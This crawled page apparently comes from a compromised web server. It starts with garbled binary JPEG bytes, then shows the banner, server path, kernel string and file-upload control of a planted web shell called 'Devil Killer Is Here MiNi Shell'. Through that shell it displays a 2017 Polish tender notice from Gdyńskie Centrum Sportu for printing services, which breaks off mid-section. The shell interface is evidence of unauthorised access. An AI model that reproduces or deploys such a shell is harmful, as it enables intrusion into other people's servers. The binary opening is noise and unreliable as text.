JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170210/23353-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.gdyniasport.pl' target='_blank'>http://www.gdyniasport.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 23353 - 2017
              z dnia 2017-02-10 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Gdynia: Usługa drukowania dla potrzeb Gdyńskiego Centrum Sportu<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gdyńskie Centrum Sportu, krajowy numer identyfikacyjny
              191439845, ul.
               Olimpijska 
              5/9,
              81-538 
              Gdynia, woj.
              pomorskie, państwo
              Polska, tel.
              +48586223574, e-mail
              sekretariat@gdyniasport.pl, faks
              +48586223574.
              <br />
              Adres strony internetowej (URL): www.gdyniasport.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.gdyniasport.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w formie pisemnej w sekretariacie Zamawiającego <br />
                Adres:
                <br />ul. Olimpijska 5/9 81-538 Gdynia</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Usługa drukowania dla potrzeb Gdyńskiego Centrum Sportu<br /><b>Numer referencyjny: </b>GCS.DZPI.2710.5.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiot zamówienia zgodnie z CPV sklasyfikowany jest jako: 79810000-5 - usługi drukowania, 79823000-9  usługi drukowania i dostawy.
2.	Przedmiotem zamówienia jest usługa wydrukowania wraz z dostawą plakatów, zaproszeń, ulotek informacyjnych, kalendarzy, teczek, notesów, banerów  i innych druków (zwanych dalej łącznie Drukami), wykonanych zgodnie z wytycznymi Zamawiającego, dla potrzeb Gdyńskiego Centrum Sportu.
3.	Wykonawca w ramach zamówienia zobowiązany będzie dostarczyć:
1)	Plakaty A2 muszą spełniać poniższe parametry:
a)	format  A2,
b)	rodzaj papieru  kreda  z połyskiem,
c)	gramatura  min. 250 g/m2,
d)	kolorystyka  4/4 CMYK
e)	Zamawiający przedstawi Wykonawcy projekt plakatów,
f)	ilość: 6000 sztuk/ Zamawiający w ramach zamówienia przewiduje kilkanaście/kilkadziesiąt  różnych projektów plakatów, 
g)	Zamawiający przewiduje jednorazowe zapotrzebowanie na:
g1)  100 szt. plakatów x 10 nakładów,
g2)  250 szt. plakatów x 14 nakładów,
g3)  500 szt. plakatów x 3 nakłady,
2)	Plakaty A2 muszą spełniać poniższe parametry:
a)	format  A2,
b)	rodzaj papieru  kreda  z połyskiem,
c)	gramatura  min. 250 g/m2,
d)	kolorystyka  4/0 CMYK
e)	Zamawiający przedstawi Wykonawcy projekt plakatów,
f)	ilość: 1000 sztuk/ Zamawiający w ramach zamówienia przewiduje kilka/kilkanaście  różnych projektów plakatów, 
g)	Zamawiający przewiduje jednorazowe zapotrzebowanie na:
g1) 20 szt. plakatów x  5 nakładów,
g2) 50 szt. plakatów x 4 nakłady,
g3) 100 szt. plakatów x 2 nakłady,
g4) 500 szt. plakatów x 1 nakład,
3)	Stojaki tekstylne muszą spełniać poniższe parametry:
a)	format  955 x 2300 mm
b)	kolorystyka - 4/4 CMYK,
c)	konstrukcja  prosta,  aluminiowa, łatwo składana, do samodzielnego montażu,
d)	materiał  - flagowy, wykończony zamkiem błyskawicznym, możliwość prania w pralce,
e)	materiał naciągany bezpośrednio na konstrukcje,
a)	ilość: 17 sztuk/ Zamawiający w ramach zamówienia przewiduje kilka projektów, Zamawiający przewiduje jednorazowe zapotrzebowanie na min 1 sztukę,
4)	Ściankę sponsorską tekstylną musi spełniać poniższe parametry:
a)	format  2m x 5 m,
b)	kolorystyka  4/4 CMYK, 
c)	konstrukcja  prosta, aluminiowa, łatwo składana, do samodzielnego montażu,
d)	materiał  - flagowy, wykończony zamkiem błyskawicznym, możliwość prania w pralce,
e)	materiał naciągany bezpośrednio na konstrukcje,
f)	ilość: 1 sztuka/ Zamawiający przedstawi Wykonawcy projekt,
5)	Ulotki informacyjne 3x DL muszą spełniać poniższe parametry: 
a)	format  po złożeniu DL, sposób składania w C,
b)	rodzaj papieru  kreda mat,
c)	gramatura  min. 300 g/m2,
d)	kolorystyka  4/4 CMYK,
e)	wykończenie  folia mat, bigowanie, składanie, 
f)	Zamawiający przedstawi Wykonawcy projekt ulotek,
g)	Ilość: 800 sztuk/ Zamawiający przewiduje 2 projekty ulotek, 
h)	Zamawiający przewiduje jednorazowo zapotrzebowanie na  300 szt. i 500 szt. ulotek,
6)	Ulotki informacyjne do A5 (Race Book) muszą spełniać poniższe parametry: 
a)	format  po złożeniu A5,
b)	ilość stron/sposób składania  8 stron, forma mapy, 
c)	rodzaj papieru  kreda mat,
d)	gramatura  min. 250 g/m2,
e)	kolorystyka  4/4 CMYK,
f)	wykończenie  bigowanie, składanie, 
g)	Zamawiający przedstawi Wykonawcy projekt ulotek,
h)	ilość: 4000 sztuk/ Zamawiający przewiduje 4 projekty ulotek, Zamawiający przewiduje jednorazowo zapotrzebowanie na 1000 szt. ulotek,
7)	Ulotki informacyjne do A5 (GPX  poczta) muszą spełniać poniższe parametry: 
a)	format   A5,
b)	rodzaj papieru  kreda mat,
c)	gramatura  min. 170 g/m2,
d)	kolorystyka  4/4 CMYK,
e)	wykończenie  bigowanie, składanie, 
f)	Zamawiający przedstawi Wykonawcy projekt ulotek,
g)	ilość: 500 000 sztuk/ Zamawiający przewiduje 4 projekty ulotek, 
h)	Zamawiający przewiduje jednorazowo zapotrzebowanie na:
h1) 25 000 szt. ulotek x 4 nakłady,
h2) 100 000 szt. ulotek x 4 nakłady,
8)	Banery wraz z montażem na kostki promocyjne muszą spełniać poniższe parametry:
a)	format  250 wys./ 1010 szer. cm,
b)	materiał  baner block out, 600 g,
c)	kolorystyka  4/0 CMYK, nadruk solventowy twardy, 
d)	wykonany - materiał lekki, wytrzymały na zginanie, rozciąganie, odporne na działanie warunków atmosferycznych  (różnice temperatur, wilgoć),
e)	montaż  baner montowany na metalową kostkę (250 x 250 cm) za pomocą specjalistycznej mocnej taśmy dwustronnej + montaż w górnej części za pomocą linek (Wykonawca dostarcza linki i taśmy potrzebne do montażu),
f)	ilość: 8 sztuk/  Zamawiający przedstawi Wykonawcy kilka projektów, 
g)	Zamawiający przewiduje jednorazowo zapotrzebowanie na:
g1) 2 sztuki x 2 nakłady,
g2) 4 sztuki x 1 nakład,
9)	Zaproszenia muszą spełniać poniższe parametry:
a)	format -  po złożeniu  100 x 210 mm,
b)	   rodzaj papieru  kreda mat,
c)	   kolorystyka  4/4 CMYK,
d)	   gramatura  min. 350 g/m2,
e)	   wykończenie  laminat aksamitny soft dwustronny, wybiórczo lakier UV dwustronny, bigowanie, składanie, 
f)	 Zamawiający przedstawi Wykonawcy projekt zaproszeń,
g)	Ilość: 1500 sztuk / Zamawiający przewiduje jeden projekt zaproszeń, 
10)	Kalendarze wieloplanszowe muszą spełniać poniższe parametry:
a)	14 kartek,
b)	łączenie  metalowa w kolorze białym spirala po krótkim boku z zawieszką,
c)	format - 480 mm x 650 mm,
d)	kolorystyka  4/0 CMYK,
e)	rodzaj papieru  kreda mat, 
f)	gramatura  min. 350 g/m2,
g)	wykończenie - folia matowa, wybiórczo lakier UV,
h)	ilość - 300 sztuk/ Zamawiający przedstawi jeden projekt.
11)	Podręczniki zdrowego żywienia muszą spełniać poniższe parametry:
a)	Format - 210mm x 210mm,
b)	ilość stron - 48 stron,
c)	papier -  kreda połysk,
d)	gramatura  min. 200 g/m2,
e)	kolorystyka - 4/4 CMYK,
f)	łączenie -  2 zszywki,
g)	ilość - 500 sztuk/ Zamawiający przedstawi jeden projekt. Zamawiający przedstawi projekt Wykonawcy.
12)	Notatniki A5 muszą spełniać poniższe parametry:
a)	format - A5, pion,
b)	ilość stron -  2 + 50,
c)	papier -  kreda mat,  350 g (okładka), offset 90 g (wnętrze),
d)	kolorystyka - 4/0 CMYK, znak wodny na każdej stronie,
e)	łączenie -  biała spirala po krótkim boku,
f)	wykończenie - folia mat okładka,
g)	ilość - 200 sztuk/ Zamawiający przewiduje w ramach zamówienia 1 projekt, Zamawiający przedstawi projekt Wykonawcy,
13)	Foto książki muszą spełniać poniższe parametry:
a)	format -  A4, poziom,
b)	ilość stron:  4 + 24,
c)	papier -  okładka z podbiciem tekturowym 400 g, kreda połysk 170 g wnętrze,
d)	kolorystyka - 4/4 CMYK,
e)	łączenie - klejone po krótkim boku,
f)	wykończenie - okładka folia połysk,
g)	ilość  30 sztuk/Zamawiający przewiduje w ramach zamówienia 1 projekt, Zamawiający przedstawi projekt Wykonawcy.
14)	Katalogi klejone (raport ewaluacyjny) muszą spełniać poniższe parametry:
a)	format -  A4, pion,
b)	ilość stron: do 100,
c)	papier: kreda mat,
d)	gramatura  min. 200 g/m2,
e)	kolorystyka - 4/4 CMYK,
f)	łączenie - klejone po długim boku,
g)	ilość  50 sztuk/Zamawiający przewiduje w ramach zamówienia 1 projekt, Zamawiający przedstawi projekt Wykonawcy,
15)	Wizytówki muszą spełniać poniższe parametry:
a)	format -  90 x 50 mm z wykrojnika, 
b)	papier: kreda mat,
c)	gramatura  min. 450g/m2, 
d)	kolorystyka -  4/4 CMYK,
e)	wykończenie  folia mat, wybiórczo lakier UV,
f)	ilość  5450 sztuk/Zamawiający przewiduje w ramach zamówienia do 50 projektów, Zamawiający przedstawi projekty Wykonawcy. 
g)	Zamawiający przewiduje jednorazowe zapotrzebowanie na:
g1) 50 szt. wizytówek x 23 nakłady,
g2) 100 szt. wizytówek  x 15 nakładów,
g3) 200 szt. wizytówek x 5 nakładów,
g4) 800 szt.  wizytówek x 1 nakład,
g5) 1000 szt. wizytówek x 1 nakład,
16)	Teczki tekturowe z wykrojnika muszą spełniać poniższe parametry:
a)	format -  po złożeniu 220 x 305 mm,
b)	grzbiet -  5 mm,
c)	papier - kreda mat, 
d)	gramatura  min. 350g/m2, 
e)	kolorystyka: 4/0 CMYK,
f)	wykończenie - Laminat aksamitny, wybiórczo lakier UV, bigowanie, składanie,
g)	gumka -  pomarańczowa,
h)	ilość  1000 sztuk/Zamawiający przewiduje w ramach zamówienia 1 projekt, Zamawiający przedstawi projekt Wykonawcy,
17)	Podkładki z klipsem muszą spełniać poniższe parametry:
a)	format - A4,
b)	materiał - tektura grubości 2 mm,
c)	kolorystyka - 4/4 CMYK,
d)	wykończenie -  laminat błysk obustronnie, metalowy klip do kartek,
e)	ilość  100 sztuk/ Zamawiający przewiduje w ramach zamówienia 1 projekt, Zamawiający przedstawi projekt Wykonawcy.
18)	Torby papierowe foliowane muszą spełniać poniższe parametry:
a)	Format - 240 x 340 x 90 mm, pion,
b)	papier - kreda mat,
c)	gramatura  min. 170g/m2, 
d)	kolorystyka -  4/0 CMYK,
e)	wykończenie - folia mat, wybiórczo lakier UV, biały sznurek,
f)	ilość  300 sztuk/ Zamawiający przewiduje w ramach zamówienia 1 projekt, Zamawiający przedstawi projekt Wykonawcy,
19)	Dyplomy okolicznościowe muszą spełniać poniższe parametry:
a)	format  A4,
b)	rodzaj papieru  kreda mat,
c)	gramatura  min. 200 g/m2,
d)	kolorystyka  4/0 CMYK,
e)	Ilość: 5000 sztuk/ Zamawiający przewiduje w ramach zamówienia 1 projekt, Zamawiający przedstawi projekt Wykonawcy,
20)	Siatki mesh muszą spełniać poniższe parametry:
a)	format - 100 x 200 cm,
b)	materiał - siatka mech, 
c)	gramatura  min. 270g/m2, 
d)	kolorystyka - 4/0 CMYK, nadruk solventowy twardy,
e)	wykończenie - wzmocniony na krawędziach, wyposażony w zakuwane oczka o średnicy 2 cm w odstępach 25 cm,
f)	 ilość: 20 sztuk/ Zamawiający przewiduje w ramach zamówienia kilka/kilkanaście projektów, Zamawiający przedstawi projekty Wykonawcy. Zamawiający przewiduje jednorazowe zapotrzebowanie na min 1 szt,
21)	Czeki muszą spełniać poniższe parametry:
a)	format A3,
b)	rodzaj papieru- kreda z połyskiem,
c)	gramatura-min 300g/m2,
d)	kolorystyka  4/0 CMYK,
e)	wykończenie  laminowanie, 
f)	ilość: 400 sztuk/ Zamawiający przewiduje w ramach zamówienia 400 projektów, Zamawiający przedstawi Wykonawcy projekt, Zamawiający przewiduje jednorazowe zapotrzebowanie na min 1 sztukę,
22)	Tablice informacyjne muszą spełniać poniższe parametry:
a)	format płyty 970 x 500 mm,
b)	rodzaj płyty- płyta twarda PCV do druku, lekka o dużej sztywności, o dobrych właściwościach mechanicznych i wysokiej udarności, 
c)	grubość płyty  - 3 mm,
d)	kolorystyka  4/0 CMYK,
e)	wykończenie  oczkowanie w narożnikach, 
g)	ilość: 20 sztuk/ Zamawiający przewiduje kilka/kilkanaście różnych projektów, Zamawiający przedstawi Wykonawcy projekt. Zamawiający przewiduje jednorazowe zapotrzebowanie na min 1 sztukę,
23)  Banery  ścianki na scenę muszą spełniać poniższe parametry:
a)	format 323 x 345 cm,
b)	materiał -  baner block out, 
c)	gramatura-min. 270g/m2,
d)	kolorystyka: 4/0 CMYK, nadruk solventowy twardy,
e)	wykończenie -  wzmocniony na krawędziach, wyposażony w zakuwane oczka o średnicy 2 cm w odstępach 25 cm,
f)	ilość: 4 sztuki/ Zamawiający przewiduje w ramach zamówienia kilka  projektów, Zamawiający przedstawi projekty Wykonawcy. Zamawiający przewiduje jednorazowe zapotrzebowanie na min 1 szt.
4.	Zamawiający każdorazowo przekaże Wykonawcy projekt Druków, o których mowa w ust.3 pkt.1-23. Wykonawca na bazie przesłanego przez Zamawiającego projektu wydrukuje i dostarczy Druki.
5.	Zamawiający informuje, iż ilości Druków oraz nakładów wskazane w ust. 3 są ilościami szacowanymi (przewidywanymi przez Zamawiającego). Zamawiający zastrzega sobie prawo do niewykorzystania w całości ilości zamówienia, jeżeli wynikać to będzie z jego faktycznych potrzeb w zakresie przedmiotu umowy. Z tytułu zmniejszenia ilości zamówienia Wykonawcy nie przysługują żadne roszczenia wobec Zamawiającego.
6.	Wymagania co do sposobu świadczenia przedmiotu zamówienia:
a)	przedmiot zamówienia realizowany będzie sukcesywnie, zgodnie z zapotrzebowaniem  Zamawiającego i na każdorazowe jego wezwanie, 
b)	wydrukowanie i dostarczenie Druków, o których mowa w ust. 3 pkt. 1- 23 realizowane będzie w terminie 5 dni roboczych od dnia złożonego przez Zamawiającego faksem lub mailem zapotrzebowania; Druki Wykonawca dostarcza bezpośrednio do siedziby Zamawiającego, w godzinach urzędowania tj. od poniedziałku do piątku pomiędzy 7:30 a 15:30,
c)	wskazane w ust. 3 pkt. 8 banery winny zostać zamontowane przez Wykonawcę na kostki promocyjne będące własnością Zamawiającego, które są zlokalizowane na parkingu przy  ulicy  Olimpijskiej 5/9 w Gdyni,
d)	w przypadku stwierdzenia niezgodności ilościowych, pomyłek, uszkodzenia lub wad jakościowych otrzymanych Druków, Zamawiający postawi Druki do dyspozycji Wykonawcy, oraz niezwłocznie/zgłoszenie telefoniczne potwierdzone faksem lub mailowo/ powiadomi Wykonawcę o stwierdzonych brakach i wadach w Drukach,
e)	Wykonawca będzie zobowiązany w terminie maksymalnie 2 dni roboczych od wpłynięcia reklamacji dostarczyć zastępczą/brakującą partię Druków wolną od wad bezpośrednio do siedziby Zamawiającego, w godzinach jego urzędowania tj. od poniedziałku do piątku pomiędzy 7:30 a 15:30,
f)	wykaz osób upoważnionych do składania zapotrzebowania oraz do podpisywania i odbioru faktur w imieniu Zamawiającego zawierać będzie załącznik nr 1 do umowy,
g)	Wykonawca zobowiązany będzie do realizacji przedmiotu zamówienia na własny koszt, przy udziale własnych materiałów, środka transportu lub może zlecić dostawę innemu przewoźnikowi,
h)	Wykonawca zobowiązany jest należycie zabezpieczyć Druki na czas transportu oraz ponosi całkowitą odpowiedzialność za dostawę Druków.
7.	Wykonawca zobowiązany jest udzielić rocznej gwarancji i rękojmi za wady na zaoferowany przedmiot zamówienia. Termin liczony jest osobno dla poszczególnych partii Druków, liczony od daty dostawy poszczególnych partii Druków.
8.	Wykonawca zobowiązany jest wskazać w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. Wykonawca ponosi pełną odpowiedzialność za prace wykonane przez podwykonawców również za usterki  
9.	Zamawiający nie przewiduje zawarcia umowy ramowej.
10.	Zamawiający nie ustanawia dynamicznego systemu zakupów.
11.	W niniejszym postępowaniu w ocenie Zamawiającego brak jest czynności do których niezbędne jest wykonywanie pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (t.j. Dz. U. z 2014 r. poz. 1502, z późn. zm.) w związku z czym Zamawiający nie określa na podstawie  art.  29  ust.  3a Ustawy, wymagań odnośnie zatrudnienia przez Wykonawcę lub podwykonawcę osób na podstawie umowy o pracę.
<br /><br /><b>II.5) Główny kod CPV: </b>79810000-5<br /><b> Dodatkowe kody CPV:</b>79823000-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego. Zamówienia uzupełniające mogą dotyczyć całości przedmiotu zamówienia<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że:
